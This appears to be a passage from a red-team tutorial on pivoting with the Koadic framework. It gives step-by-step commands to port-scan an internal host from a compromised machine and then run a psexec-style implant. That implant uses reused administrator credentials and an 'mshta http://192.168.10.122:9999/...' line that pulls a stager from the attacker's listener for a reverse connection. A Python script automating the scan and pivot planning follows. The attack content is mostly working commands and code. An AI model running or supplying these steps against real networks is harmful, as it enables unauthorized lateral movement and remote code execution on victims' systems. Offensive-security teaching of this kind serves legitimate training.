Hands-On Red Team Tactics

Pivoting

We now have access to the 192.168.10.171 system. Using the credentials recovered from it, we can move laterally and try to reach another system on the same network. For this to work, we first need to know which services that system exposes, so we use the implant/scan/tcp implant to port scan it from the existing zombie, as follows:

use implant/scan/tcp 
info 
set rports 135,139,445 
set rhosts 192.168.10.130 
set zombie 0

The implant is ready to roll! Now we just need to run it:

run  

If the scan reports these ports open, the target speaks SMB on port 445. Psexec-style execution rides on that: it authenticates over SMB and talks to the Service Control Manager via RPC on the svcctl named pipe to create and start a service whose command line is whatever we supply. The idea is therefore to use that remote execution to run our stager command, which gets us a reverse connection over MSHTA. For this, we use the exec_psexec implant and set its cmd option to
mshta http://192.168.10.122:9999/fGLYN, which will execute our stager on the internal system:

use implant/pivot/exec_psexec 
info 
set cmd "mshta http://192.168.10.122:9999/fGLYN"

We also need to give it credentials. Because the implant authenticates over SMB, the account must be a local administrator on the target; here we assume the administrator password is reused on 192.168.10.130:

set smbuser administrator 
set smbpass 123456 
set zombie 1 

The implant is ready to run, so let's run it:

run 

When the implant runs, it executes the given CMD on 192.168.10.130; mshta fetches the stager from our listener and the new host hooks itself up to Koadic.

Listing the zombies with the zombies command now shows that we have access to 192.168.10.130 as well.
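The two steps above, a connect scan of the SMB ports followed by choosing which hosts are candidates for a psexec-style pivot, as a stand-alone Python script. This is an added illustration, not Koadic's own implant code, and the ports, hosts and stager values are constructed to match the chapter; the probe function is injectable so the logic can be exercised offline without a network.

```python
"""Connect scan plus pivot planning, mirroring the Koadic steps above (added example)."""
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Iterable, List


def parse_ports(spec: str) -> List[int]:
    """Parse a Koadic-style RPORTS string such as "135,139,445" or "135-139,445"."""
    ports: List[int] = []
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            ports.extend(range(lo, hi + 1))
        else:
            ports.append(int(part))
    bad = [p for p in ports if not 0 < p < 65536]
    if bad:
        raise ValueError(f"port out of range: {bad}")
    return sorted(set(ports))


def tcp_connect(host: str, port: int, timeout: float = 1.0) -> bool:
    """Real probe: True only if a full TCP handshake completes within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(hosts: Iterable[str], ports: Iterable[int],
         probe: Callable[[str, int], bool] = tcp_connect,
         workers: int = 32) -> Dict[str, List[int]]:
    """Connect-scan every host/port pair in parallel; returns {host: [open ports]}."""
    host_list = list(hosts)
    port_list = list(ports)
    pairs = [(h, p) for h in host_list for p in port_list]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda hp: probe(*hp), pairs))
    open_ports: Dict[str, List[int]] = {h: [] for h in host_list}
    for (h, p), is_open in zip(pairs, results):
        if is_open:
            open_ports[h].append(p)
    return open_ports


def stager_command(lhost: str, lport: int, path: str) -> str:
    """Build the mshta one-liner handed to exec_psexec's cmd option."""
    return f"mshta http://{lhost}:{lport}/{path.lstrip('/')}"


def plan_pivot(open_ports: Dict[str, List[int]], cmd: str) -> Dict[str, str]:
    """Keep only hosts where SMB (445) answered: psexec-style execution needs it.
    Ports 135/139 being open alone is not enough, so those hosts are skipped."""
    return {h: cmd for h, ps in open_ports.items() if 445 in ps}


if __name__ == "__main__":
    # Constructed data: .130 exposes 135/139/445, .131 only 135 (assumption for the demo).
    fake_open = {("192.168.10.130", p) for p in (135, 139, 445)} | {("192.168.10.131", 135)}
    res = scan(["192.168.10.130", "192.168.10.131"], parse_ports("135,139,445"),
               probe=lambda h, p: (h, p) in fake_open)
    print(res)
    print(plan_pivot(res, stager_command("192.168.10.122", 9999, "fGLYN")))
```

Run against real hosts by dropping the probe override; the default probe is a plain connect scan, so it is as noisy on the wire as the Koadic implant, and a host that only answers on 135 and 139 is deliberately left out of the pivot plan.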

What can be done with Koadic is limited mostly by the operator's imagination.